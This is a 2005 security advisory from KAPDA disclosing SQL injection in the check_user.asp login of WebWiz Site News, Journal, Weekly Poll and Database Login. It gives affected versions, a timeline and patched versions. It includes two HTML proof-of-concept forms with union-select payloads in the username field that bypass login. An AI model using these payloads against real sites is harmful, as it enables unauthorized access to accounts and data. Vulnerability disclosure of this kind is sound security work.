WebWiz Products SQL_Injection
SQL_Injection
-------
[KAPDA::#18] - WebWiz Products SQL_Injection
Happy new year !
KAPDA New advisory
Vulnerable products :
webwiz site news access2000 : vesion 3.06 and prior versions
webwiz journal access2000 : version 1.0
webwiz weekly poll access2000 : version 3.06 and prior versions
database login access2000 : version 1.71 and prior versions
webwiz site news access97 : version 3.06 and prior versions
webwiz journal access97 : version 1.0
webwiz weekly poll access97 : version 3.06 and prior versions
database login access97 : version 1.71 and prior versions
Vendor: http://www.webwizguide.info
Risk: High
Vulnerability: SQL_Injection
Date :
--------------------
Found : Aug 14 2005
Vendor Contacted : Dec 30 2005
Release Date : Dec 30 2005
About WebWiz Products :
--------------------
Vendor`s description
WebWiz site news : http://webwizguide.info/asp/sample_scripts...news_script.asp
WebWiz journal : http://webwizguide.info/asp/sample_scripts...application.asp
WebWiz weekly poll : http://webwizguide.info/asp/sample_scripts...poll_script.asp
WebWiz Password Login Page (Database Login) : http://webwizguide.info/asp/sample_scripts...ogin_script.asp
Discussion :
----------------
Some input passed to "check_user.asp" when logging in isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Vulnerabilities:
--------------------
SQL_Injection in "/[product]/check_user.asp" .
At parameter named 'txtUserName', Attacker can enter SQL command to login to the system.(For all products)
Proof of Concepts:
--------------------
<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="'union all select '1','1' from tblConfiguration where ''='">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="'union select 1 from tblusers where''='">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
Solution:
--------------------
Web Wiz Site News:
Update to version 3.07.
http://webwizguide.info/asp/sample_scripts...news_script.asp
Web Wiz Journal:
Update to version 1.0.1.
http://webwizguide.info/asp/sample_scripts...application.asp
Web Wiz Polls:
Update to version 3.07.
http://webwizguide.info/asp/sample_scripts...poll_script.asp
Web Wiz Database Login:
Update to version 1.72.
http://webwizguide.info/asp/sample_scripts...ogin_script.asp
Original Advisory:
--------------------
http://www.kapda.ir/advisory-167.html
Credit :
--------------------
DevilBox of KAPDA
devil_box [at} kapda.ir
Kapda - Security Science Researchers Insitute of Iran
http://www.KAPDA.ir
-------
By FarhadKey On 30 Dec 2005